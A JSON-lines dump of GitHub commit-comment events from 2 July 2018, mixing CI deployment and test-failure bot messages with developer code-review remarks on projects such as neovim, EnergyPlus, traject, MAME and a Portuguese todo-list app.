{"id":"7908534733","type":"CommitCommentEvent","actor":{"login":"dorothee-reinhard"},"repo":{"name":"dorothee-reinhard/sample-cloud-native-toolchain-tutorial-20180620184046996"},"payload":{"comment":{"id":29571178,"position":null,"line":null,"path":null,"commit_id":"a68965fc761f4a9fde0f34cadc779fd46db25ba0","created_at":"2018-07-02T19:34:34Z","updated_at":"2018-07-02T19:34:34Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/9b500bcd-bbc5-426d-af33-ded21a77a910?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180620184046996\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/46be8e2f-80f6-4609-a8ac-8400cf1a122e?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180620184046996\") deployed [sample-cloud-native-toolchain-tutorial-20180620184046996](https://github.com/dorothee-reinhard/sample-cloud-native-toolchain-tutorial-20180620184046996/releases/tag/deploy-ibm-yp-us-south-IBM_ZH-test-20180702-193433 \"deploy-ibm-yp-us-south-IBM_ZH-test-20180702-193433\") to [test](https://console.bluemix.net/apps/f9e0007d-ce13-40d0-8367-366e603a693d?env_id=ibm:yp:us-south \"ibm:yp:us-south:IBM_ZH:test\"), including this commit"}},"created_at":"2018-07-02T19:34:34Z"}
{"id":"7908536775","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29571184,"position":null,"line":null,"path":null,"commit_id":"7b2027f212c6ef3ecd8604d23ffdafe267d39625","created_at":"2018-07-02T19:35:03Z","updated_at":"2018-07-02T19:35:03Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2930 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b2027f212c6ef3ecd8604d23ffdafe267d39625-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b2027f212c6ef3ecd8604d23ffdafe267d39625-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.27%25-red.png)</a> \n"}},"created_at":"2018-07-02T19:35:03Z"}
{"id":"7908537059","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29571185,"position":null,"line":null,"path":null,"commit_id":"9347a5fc1acfc621184cb5d5fee346d3ac2d5edd","created_at":"2018-07-02T19:35:08Z","updated_at":"2018-07-02T19:35:08Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-02T19:35:08Z"}
{"id":"7908539564","type":"CommitCommentEvent","actor":{"login":"Altemio"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29571192,"position":null,"line":null,"path":null,"commit_id":"82f59d9be6009a4b4707d758e00207c9a91fd9d9","created_at":"2018-07-02T19:35:45Z","updated_at":"2018-07-02T19:35:45Z","author_association":"OWNER","body":"You do know what factor is, and how it works?\r\n\r\nFactor is a multiplier of AI weight - a factor of 1.0 doesn't do anything, whist a factor below 1.0 reduces the chance (ie kind characters might have 0.9, so if the weight is 100 it reduces it to 90).\r\n\r\nSo setting different culture group factor from 2.0 (doubles the weight and therefore the chance of joining) to 1.0 makes being in a different culture group not matter at all.\r\n\r\nAlso if someone is the same culture, it instantly halves the weight (0.5).\r\n\r\nThat person is also in the same culture group, so it will reduce it to 75% of that value (since both are valid conditions) - so from 100 to 50 to 37.5 - so someone of the same culture is _really_ unlikely to join as is. Traits and opinion are the biggies. I basically never see independence revolts from same culture as-is (I keep crashing though)."}},"created_at":"2018-07-02T19:35:45Z"}
{"id":"7908541296","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":29571203,"position":5,"line":205,"path":"src/nvim/tui/tui.c","commit_id":"4a83b64777b22933de186665ddb4d0570675c667","created_at":"2018-07-02T19:36:12Z","updated_at":"2018-07-02T19:36:12Z","author_association":"MEMBER","body":"@jamessan Good thought, but all of those places support NULL `term`."}},"created_at":"2018-07-02T19:36:12Z"}
{"id":"7908542590","type":"CommitCommentEvent","actor":{"login":"rahul-winner"},"repo":{"name":"kvcrawford/c3"},"payload":{"comment":{"id":29571206,"position":null,"line":null,"path":null,"commit_id":"a0e60deef216626b95009876ed8ff345d29e3d36","created_at":"2018-07-02T19:36:31Z","updated_at":"2018-07-02T19:36:31Z","author_association":"NONE","body":"did we make some progress here? Have we merged this PR?"}},"created_at":"2018-07-02T19:36:31Z"}
{"id":"7908544290","type":"CommitCommentEvent","actor":{"login":"Aaron-SP"},"repo":{"name":"ocket8888/mgl"},"payload":{"comment":{"id":29571210,"position":null,"line":null,"path":null,"commit_id":"99df5a8a80cd33c90f76217e4e8d5bbcb78cd6af","created_at":"2018-07-02T19:36:56Z","updated_at":"2018-07-02T19:36:56Z","author_association":"NONE","body":"I just didn't want you to waste time, but if you are having fun I don't care.\r\n\r\nI added a shared library to BDS and I found out some fun linking issues with GLEW. If you get linker errors about \"multiple definitions etc.\" when trying to consume the library, then I can explain what I am currently thinking. It is how GLEW exports the OpenGL function pointers. I think all of GLEW must be compiled in the same translation unit, but I don't know for sure.\r\n\r\nProceed with caution.\r\n\r\n"}},"created_at":"2018-07-02T19:36:56Z"}
{"id":"7908545008","type":"CommitCommentEvent","actor":{"login":"ColinFrick"},"repo":{"name":"ColinFrick/Fomantic-UI"},"payload":{"comment":{"id":29571215,"position":13,"line":1028,"path":"src/definitions/modules/search.js","commit_id":"4d70a5aed8607ac7e1ce64653334dda75ebba20a","created_at":"2018-07-02T19:37:08Z","updated_at":"2018-07-02T19:37:08Z","author_association":"OWNER","body":"Header shouldn't be set if empty or undefined. Otherwise \"No Results\" would be with the server error as well."}},"created_at":"2018-07-02T19:37:08Z"}
{"id":"7908545583","type":"CommitCommentEvent","actor":{"login":"jrochkind"},"repo":{"name":"traject/traject"},"payload":{"comment":{"id":29571217,"position":null,"line":null,"path":null,"commit_id":"de0ec11c7b4680651e769220b00db5cece70ca67","created_at":"2018-07-02T19:37:15Z","updated_at":"2018-07-02T19:37:15Z","author_association":"CONTRIBUTOR","body":"Hmm, I'm afraid looking at this again, I'm not a _huge_ fan of it.  We're sending a `commit` to solr, which isn't exactly a no-op.  I wonder if there's any other payload we can include that will actually be a no-op -- all we're really trying to do here is figure out if this solr responds at `/update/json`, or 404s. \r\n\r\nAny ideas @farooqsadiq ?"}},"created_at":"2018-07-02T19:37:15Z"}
{"id":"7908545951","type":"CommitCommentEvent","actor":{"login":"goodmami"},"repo":{"name":"delph-in/pydmrs"},"payload":{"comment":{"id":29571218,"position":null,"line":null,"path":null,"commit_id":"c1cd2953578f367e2f2a9e62e6b9914bc03d694e","created_at":"2018-07-02T19:37:20Z","updated_at":"2018-07-02T19:37:20Z","author_association":"MEMBER","body":"@emm68 While this is correct as letter-case is irrelevant on predicates, in practice I found that some processors (ACE, at least) relies on the predicate case during lexical lookup, e.g., for generation. For this reason I store the original form of the predicate and use that for serialization, but I use the case-normalized form for comparisons. If you don't plan to generate from the outputs of pydmrs you should be safe.\r\n\r\nJust a heads up"}},"created_at":"2018-07-02T19:37:20Z"}
{"id":"7908546534","type":"CommitCommentEvent","actor":{"login":"dorothee-reinhard"},"repo":{"name":"dorothee-reinhard/sample-cloud-native-toolchain-tutorial-20180620184046996"},"payload":{"comment":{"id":29571221,"position":null,"line":null,"path":null,"commit_id":"a68965fc761f4a9fde0f34cadc779fd46db25ba0","created_at":"2018-07-02T19:37:30Z","updated_at":"2018-07-02T19:37:30Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/9b500bcd-bbc5-426d-af33-ded21a77a910?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180620184046996\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/46be8e2f-80f6-4609-a8ac-8400cf1a122e?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180620184046996\") deployed [sample-cloud-native-toolchain-tutorial-20180620184046996](https://github.com/dorothee-reinhard/sample-cloud-native-toolchain-tutorial-20180620184046996/releases/tag/deploy-ibm-yp-us-south-IBM_ZH-prod-20180702-193730 \"deploy-ibm-yp-us-south-IBM_ZH-prod-20180702-193730\") to [prod](https://console.bluemix.net/apps/b1a0d1bc-33c1-4ea4-892f-008268415424?env_id=ibm:yp:us-south \"ibm:yp:us-south:IBM_ZH:prod\"), including this commit"}},"created_at":"2018-07-02T19:37:30Z"}
{"id":"7908553070","type":"CommitCommentEvent","actor":{"login":"ayadlin"},"repo":{"name":"EmilChoparinov/Chip-Challenge"},"payload":{"comment":{"id":29571234,"position":108,"line":109,"path":"apps/game/AI_2.py","commit_id":"868c731257bdec4a5bcaa5d8dc6073ab0f1a2561","created_at":"2018-07-02T19:39:08Z","updated_at":"2018-07-02T19:39:08Z","author_association":"COLLABORATOR","body":"From phone,\nSo can’t comment on spot!\nSometimes you need something easy to spit :)\n\nHow is everything going? :)\n\nSent from my iPhone\n\n> On Jul 2, 2018, at 11:50, Emil Choparinov <notifications@github.com> wrote:\n> \n> 🤔\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-02T19:39:08Z"}
{"id":"7908553597","type":"CommitCommentEvent","actor":{"login":"ghedo"},"repo":{"name":"ekr/draft-rescorla-tls-esni"},"payload":{"comment":{"id":29571235,"position":10,"line":282,"path":"draft-rescorla-tls-esni.md","commit_id":"6790c4bb482c95a60dc8c8eac7559b509167cbd7","created_at":"2018-07-02T19:39:15Z","updated_at":"2018-07-02T19:39:15Z","author_association":"CONTRIBUTOR","body":"So, the client needs to validate that ESNIKeys is within not_before..not_after, so to avoid clock skew problems the server likely needs to pad them e.g. to a few days validity, which puts an upper bound on the period the client can use that key. If I understand @kazuho's motivation correctly, this was done to prevent a key from being used forever, in case the propagation between TLS and DNS is unreliable (e.g. TLS server switches to new key, but DNS still serves the old one).\r\n\r\nBut if the TLS server is confident it can reliably propagate new keys to the DNS server, then it can rotate the keys faster and forget old ones, because clients would fetch the updated key once the DNS TTL expires, as long as they don't use not_after (or something much longer than DNS TTL) to cache them."}},"created_at":"2018-07-02T19:39:15Z"}
{"id":"7908555399","type":"CommitCommentEvent","actor":{"login":"jrochkind"},"repo":{"name":"traject/traject"},"payload":{"comment":{"id":29571240,"position":null,"line":null,"path":null,"commit_id":"de0ec11c7b4680651e769220b00db5cece70ca67","created_at":"2018-07-02T19:39:42Z","updated_at":"2018-07-02T19:39:42Z","author_association":"CONTRIBUTOR","body":"I wonder if just `resp      = @http_client.get(candidate, {})` will work.  Have any time to check it and report back @farooqsadiq ?"}},"created_at":"2018-07-02T19:39:42Z"}
{"id":"7908558948","type":"CommitCommentEvent","actor":{"login":"votaguz"},"repo":{"name":"votaguz/frostwire"},"payload":{"comment":{"id":29571249,"position":34,"line":88,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackersDataLine.java","commit_id":"7954cb531538b04bd942f26e104d1f8db7446915","created_at":"2018-07-02T19:40:30Z","updated_at":"2018-07-02T19:40:30Z","author_association":"OWNER","body":"@gubatron Sometimes we get `-1` value on some of the fields. \r\nI can't figured out why, yet.  But that's seems to be the information to extract. "}},"created_at":"2018-07-02T19:40:30Z"}
{"id":"7908563068","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29571256,"position":16,"line":16,"path":"src/js/models/TodoList.js","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T19:41:26Z","updated_at":"2018-07-02T19:41:26Z","author_association":"OWNER","body":"Inclusive eu perguntei pra várias pessoas como eu poderia resolver esse problema e ainda não consegui encontrar uma solução plausível para ele. O problema é que isso nem passa pelo `Proxy` então faz com que a lista não se atualize.\r\n\r\nAdicione alguns itens na lista e execute o seguinte código no seu console:\r\n\r\n`todoController._todoList._list.length = 0;`\r\n\r\nQuando você adicionar um novo elemento na lista, ela estará vazia, conforme dito por você. Alguma sugestão do que podemos fazer para corrigir este problema?"}},"created_at":"2018-07-02T19:41:26Z"}
{"id":"7908566485","type":"CommitCommentEvent","actor":{"login":"Titokhan"},"repo":{"name":"LineageOS/hudson"},"payload":{"comment":{"id":29571262,"position":null,"line":null,"path":null,"commit_id":"5b8b352a15fc1bbfa87dc39c41269e4394053ac6","created_at":"2018-07-02T19:42:16Z","updated_at":"2018-07-02T19:42:16Z","author_association":"NONE","body":"@arco\r\n\r\nhttps://forum.xda-developers.com/showpost.php?p=76954633&postcount=2494 "}},"created_at":"2018-07-02T19:42:16Z"}
{"id":"7908568821","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29571266,"position":1,"line":1,"path":"src/js/services/ProxyCreate.js","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T19:42:52Z","updated_at":"2018-07-02T19:42:52Z","author_association":"OWNER","body":"Conforme dito via conversa no Telegram, essa foi uma forma que encontrei pra conseguir fazer uma espécie de reatividade, similar ao vue onde uma alteração no meu modelo, reflete na minha view."}},"created_at":"2018-07-02T19:42:52Z"}
{"id":"7908568959","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"WebGHC/nixpkgs"},"payload":{"comment":{"id":29571267,"position":null,"line":null,"path":null,"commit_id":"614a4bb0e8296b9628bb16eac3d8ba7291c50ee0","created_at":"2018-07-02T19:42:54Z","updated_at":"2018-07-02T19:42:54Z","author_association":"NONE","body":"This looks really useful! Do you think it can be upstreamed?"}},"created_at":"2018-07-02T19:42:54Z"}
{"id":"7908569796","type":"CommitCommentEvent","actor":{"login":"Shintany"},"repo":{"name":"Shintany/Manga-Alert"},"payload":{"comment":{"id":29571269,"position":null,"line":null,"path":null,"commit_id":"e694f10211189fd34580b044a87aa6e1f41aeee3","created_at":"2018-07-02T19:43:06Z","updated_at":"2018-07-02T19:43:06Z","author_association":"OWNER","body":"Now have to code the autocomplete functionnality."}},"created_at":"2018-07-02T19:43:06Z"}
{"id":"7908570867","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-dmwr-feedstock"},"payload":{"comment":{"id":29571271,"position":null,"line":null,"path":null,"commit_id":"9df9a8a561d13c501ea20f5bc42704dfe0cc71a9","created_at":"2018-07-02T19:43:21Z","updated_at":"2018-07-02T19:43:21Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @pravs3683 were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @pravs3683 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T19:43:21Z"}
{"id":"7908571448","type":"CommitCommentEvent","actor":{"login":"A-Kasper"},"repo":{"name":"freifunk-gluon/gluon"},"payload":{"comment":{"id":29571273,"position":null,"line":null,"path":null,"commit_id":"1231173390e2467904b9ff6ef2b8a36cbd3c95d1","created_at":"2018-07-02T19:43:30Z","updated_at":"2018-07-02T19:43:30Z","author_association":"CONTRIBUTOR","body":"Feedback:\r\nI don't understand Feature Flags. What is this? Why do I want it? What is the difference between adding a package with gluon- or without. \r\nMaybe I'm not the only one who needs more information to understand this... "}},"created_at":"2018-07-02T19:43:30Z"}
{"id":"7908576400","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29571280,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-02T19:44:38Z","updated_at":"2018-07-02T19:44:38Z","author_association":"NONE","body":"Still fails here unfortunately -\r\n\r\nhttps://hastebin.com/daroduheya.sql\r\n\r\nHere is my diff patch -\r\n\r\nhttps://hastebin.com/anowonubih.diff"}},"created_at":"2018-07-02T19:44:38Z"}
{"id":"7908577026","type":"CommitCommentEvent","actor":{"login":"adamc295"},"repo":{"name":"ProjectSWGCore/NGECore2"},"payload":{"comment":{"id":29571285,"position":null,"line":null,"path":null,"commit_id":"a5ba92cbf1966ac4b5984e9b29278015e0df1a2c","created_at":"2018-07-02T19:44:47Z","updated_at":"2018-07-02T19:44:47Z","author_association":"NONE","body":"Thanks for the flame war and making me laugh out loud.\r\n\r\nIdiots."}},"created_at":"2018-07-02T19:44:47Z"}
{"id":"7908577328","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"rust-lang/rfcs"},"payload":{"comment":{"id":29571286,"position":null,"line":null,"path":null,"commit_id":"cbebb61e9513b31472c515463d9d355614ecb0db","created_at":"2018-07-02T19:44:50Z","updated_at":"2018-07-02T19:44:50Z","author_association":"NONE","body":"cbebb61"}},"created_at":"2018-07-02T19:44:50Z"}
{"id":"7908577909","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/pyret-lang"},"payload":{"comment":{"id":29571287,"position":null,"line":null,"path":null,"commit_id":"b4541539bbc192436a0c4d822aaa6bb1ebe8572a","created_at":"2018-07-02T19:44:57Z","updated_at":"2018-07-02T19:44:57Z","author_association":"MEMBER","body":"@mkolosick this branch has two commits ahead of horizon.  One of them was cherry picked (https://github.com/brownplt/pyret-lang/commit/90ed412a4ee9e3460364e8b547598416fdc67227 copied from https://github.com/brownplt/pyret-lang/commit/0319b6d8c6793fd861a56445d6db2efa5e7127db), and then there's this one.  But... now that you've gotten rid of the `if base == \"$underscore\"` test, you now have (line 1375)\r\n```\r\n          cases(A.Name) binding.id:\r\n            | s-atom(base, _) =>\r\n              new-existential(binding.l, true)\r\n            | else =>\r\n              new-existential(binding.l, true)\r\n          end\r\n```\r\nwhich looks to me like another unnecessary test :)  So, could you delete this branch altogether, and just streamline this to `new-existential(binding.l, true)`, as a new commit on horizon?"}},"created_at":"2018-07-02T19:44:57Z"}
{"id":"7908580892","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29571294,"position":9,"line":9,"path":"src/js/views/MessageView.js","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T19:45:36Z","updated_at":"2018-07-02T19:45:36Z","author_association":"OWNER","body":"Pelo visto você não foi o único incomodado com esse switch. Na issue #1 o @luan0ap também já havia feito uma sugestão de melhoria. Essa é uma melhoria que quero fazer."}},"created_at":"2018-07-02T19:45:36Z"}
{"id":"7908582281","type":"CommitCommentEvent","actor":{"login":"pdaniell-nv"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29571297,"position":null,"line":null,"path":null,"commit_id":"8e309b01aac0564005a6e22b00c04fc28a927fe8","created_at":"2018-07-02T19:45:54Z","updated_at":"2018-07-02T19:45:54Z","author_association":"NONE","body":"Can you point me to the full GLSL shader? I can debug it and find out what happened. Thanks.\r\n"}},"created_at":"2018-07-02T19:45:54Z"}
{"id":"7908587721","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29571303,"position":1,"line":1,"path":"src/css/style.css","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T19:47:12Z","updated_at":"2018-07-02T19:47:12Z","author_association":"OWNER","body":"A ideia é reescrever todo o CSS do projeto, inclusive removendo a dependência dele do bootstrap. Essa será uma alteração que faremos quando estivermos alterando o estilo da aplicação."}},"created_at":"2018-07-02T19:47:12Z"}
{"id":"7908592406","type":"CommitCommentEvent","actor":{"login":"jamessan"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":29571308,"position":5,"line":205,"path":"src/nvim/tui/tui.c","commit_id":"4a83b64777b22933de186665ddb4d0570675c667","created_at":"2018-07-02T19:48:17Z","updated_at":"2018-07-02T19:48:17Z","author_association":"MEMBER","body":"Sure, but wouldn't it be better to use whatever `termname` is set to instead of `NULL`?"}},"created_at":"2018-07-02T19:48:17Z"}
{"id":"7908593328","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29571311,"position":5,"line":5,"path":"src/css/style.css","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T19:48:30Z","updated_at":"2018-07-02T19:48:30Z","author_association":"OWNER","body":"Eu nunca havia me atentado para o fato do elemento virar uma variável global no navegador, na real, eu nem sabia que funcionava assim. Vivendo e aprendendo. De fato, não é legal ficar poluindo o escopo global da aplicação."}},"created_at":"2018-07-02T19:48:30Z"}
{"id":"7908593675","type":"CommitCommentEvent","actor":{"login":"BillGundas"},"repo":{"name":"BillGundas/sample-repository"},"payload":{"comment":{"id":29571313,"position":null,"line":null,"path":null,"commit_id":"1badcea9b05ed594824b6837ab950e512295a4df","created_at":"2018-07-02T19:48:35Z","updated_at":"2018-07-02T19:48:35Z","author_association":"OWNER","body":"sample c# Nunit code."}},"created_at":"2018-07-02T19:48:35Z"}
{"id":"7908596849","type":"CommitCommentEvent","actor":{"login":"JonasBarros1998"},"repo":{"name":"JonasBarros1998/arquivos"},"payload":{"comment":{"id":29571316,"position":null,"line":null,"path":null,"commit_id":"60fe2bed03b975f76a522ec1bb71ae84aababdb4","created_at":"2018-07-02T19:49:19Z","updated_at":"2018-07-02T19:49:19Z","author_association":"OWNER","body":"renomear"}},"created_at":"2018-07-02T19:49:19Z"}
{"id":"7908601558","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29571323,"position":3,"line":3,"path":"src/js/models/Message.js","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T19:50:26Z","updated_at":"2018-07-02T19:50:26Z","author_association":"OWNER","body":"Que sacada legal, isso nunca passou pela minha cabeça ❤️ "}},"created_at":"2018-07-02T19:50:26Z"}
{"id":"7908605213","type":"CommitCommentEvent","actor":{"login":"iTitus"},"repo":{"name":"iTitus/PDXTools"},"payload":{"comment":{"id":29571330,"position":47,"line":86,"path":"src/main/java/io/github/ititus/pdx/stellaris/user/save/StellarisSave.java","commit_id":"7fc28ee262030e7463d3f410c3625b9bb709fdea","created_at":"2018-07-02T19:51:18Z","updated_at":"2018-07-02T19:51:18Z","author_association":"OWNER","body":"This was the culprit :/"}},"created_at":"2018-07-02T19:51:18Z"}
{"id":"7908605633","type":"CommitCommentEvent","actor":{"login":"ElvishJerricco"},"repo":{"name":"WebGHC/nixpkgs"},"payload":{"comment":{"id":29571331,"position":null,"line":null,"path":null,"commit_id":"614a4bb0e8296b9628bb16eac3d8ba7291c50ee0","created_at":"2018-07-02T19:51:23Z","updated_at":"2018-07-02T19:51:23Z","author_association":"MEMBER","body":"@matthewbauer I'm not sure to be honest. I know the triple stuff for wasm is kind of in motion at the moment; clang just swapped the `wasm32-unknown-unkown` triple from the old ELF format to the new format that `wasm32-unknown-unknown-wasm` used, and I think the former triple is becoming preferred (since we don't actually have a real kernel to talk about)."}},"created_at":"2018-07-02T19:51:23Z"}
{"id":"7908607178","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29571335,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-02T19:51:44Z","updated_at":"2018-07-02T19:51:44Z","author_association":"NONE","body":"OK, what sort of build you saw when NuGet start complaining about this.  Do you have a repro of the warning/error?  Can you share a log?"}},"created_at":"2018-07-02T19:51:44Z"}
{"id":"7908609288","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29571343,"position":null,"line":null,"path":null,"commit_id":"2b364271ce2f1d5418402da0d8c5bbd213267423","created_at":"2018-07-02T19:52:15Z","updated_at":"2018-07-02T19:52:15Z","author_association":"COLLABORATOR","body":"Der einzige, der sich hier aufregt, bist du, weil ich es gewagt habe, in einem String ein Leerzeichen zwischen Zahl und Einheit reinzumachen, wie es normal ist (5 GHz WLAN - steht übrigens in den Google-Ergebnissen auch so, z. B. bei AVM, Chip, Giga, Linksys etc., manchmal auch mit Bindestrich - 3G/4G Netze übrigens haben damit überhaupt nix zu tun, ganz anderes Thema). Nur weil es nirgends mit Leerzeichen drinsteht, weder hier noch im englischen Original, heißt das doch lange nicht, das es so auch ok ist.  Ich mag es lieber mit, ist deutlicher lesbar. Ich übertreibe nichts, stelle nix auf den Kopf - hab es hier geändert, weil es mir aufgefallen ist. Jetzt plötzlich redest du von Platzgründen? Als ich das vor einiger Zeit angesprochen habe, weil ich z. B. ein/eine/einen in den Plurals wieder durch den Platzhalter %1$d ersetzt habe, hast du diskutiert und gesagt, das ist nicht nötig, Platz ist genug. Wie hättest du es denn jetzt gern? Warum vergleichst du alles mit der Original Global? Wenn die so toll ist, warum machen wir das hier dann? Dann können wir auch einfach nur kopieren. Ich jedenfalls verbringe einen Teil meiner Freizeit hiermit, weil mir das Spaß macht, hab aber keine Lust auf diese ständige Nörgeleien und das Infragestellen, warum, wieso, weshalb ich es anders mache, als es dir gefällt oder es in der Global ist. Das waren jetzt meine 2 cents, sorry, aber musste mal raus. 😎."}},"created_at":"2018-07-02T19:52:15Z"}
{"id":"7908612165","type":"CommitCommentEvent","actor":{"login":"MooglyGuy"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29571352,"position":null,"line":null,"path":null,"commit_id":"a9f194398af68ab8b5cd15b423c4bf77ae661adb","created_at":"2018-07-02T19:52:58Z","updated_at":"2018-07-02T19:52:58Z","author_association":"CONTRIBUTOR","body":"Pass the ioports as template parameters to the device's constructor, like\nAJR and I have been doing.\n\nOn Mon, Jul 2, 2018 at 8:25 PM, tedgreen99 <notifications@github.com> wrote:\n\n> How else would you access the ioports which are defined in the root of the\n> system?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mamedev/mame/commit/a9f194398af68ab8b5cd15b423c4bf77ae661adb#commitcomment-29570379>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABzdIXzkAdayXmR7QLGgtO-4SnljyqDzks5uCmWFgaJpZM4U_pwh>\n> .\n>\n"}},"created_at":"2018-07-02T19:52:58Z"}
{"id":"7908613817","type":"CommitCommentEvent","actor":{"login":"rachface56"},"repo":{"name":"dccmarketing/tcci-2018"},"payload":{"comment":{"id":29571357,"position":null,"line":null,"path":null,"commit_id":"b95ae8cdea3491904e323c66e5e0ecf5b1b3167b","created_at":"2018-07-02T19:53:22Z","updated_at":"2018-07-02T19:53:22Z","author_association":"CONTRIBUTOR","body":"Updated css for product images on product page to reduce width from 48% to 35%. Had a request to reduce the image size."}},"created_at":"2018-07-02T19:53:22Z"}
{"id":"7908614389","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29571358,"position":null,"line":null,"path":null,"commit_id":"dff33a44bfcfa692030fb0cf6dfacd81c1a45683","created_at":"2018-07-02T19:53:31Z","updated_at":"2018-07-02T19:53:31Z","author_association":"NONE","body":"Sorry, my bad.\r\nI thought you were trying to test (ps_kingring1 + precalculated) against master.\r\nBut you are only testing (precalculated) against master, which is OK.\r\n\r\nHowever, the precalculated idea was already tested not long ago.\r\n"}},"created_at":"2018-07-02T19:53:31Z"}
{"id":"7908616352","type":"CommitCommentEvent","actor":{"login":"naiyt"},"repo":{"name":"seanrcollings/DevCampCourse"},"payload":{"comment":{"id":29571362,"position":9,"line":9,"path":"ReactCourse/madlib/src/components/card.js","commit_id":"95eafbd7d209cdc1068a5b4d20f8ec2799cd4934","created_at":"2018-07-02T19:53:59Z","updated_at":"2018-07-02T19:53:59Z","author_association":"NONE","body":"Just a random style thing, but I like two space indents rather than four."}},"created_at":"2018-07-02T19:53:59Z"}
{"id":"7908616743","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29571364,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-02T19:54:07Z","updated_at":"2018-07-02T19:54:07Z","author_association":"NONE","body":"Hmm - well - previously I didn't use GL 3.x at all but GL 2.x. So I guess these changes would require GL 3.x then?"}},"created_at":"2018-07-02T19:54:07Z"}
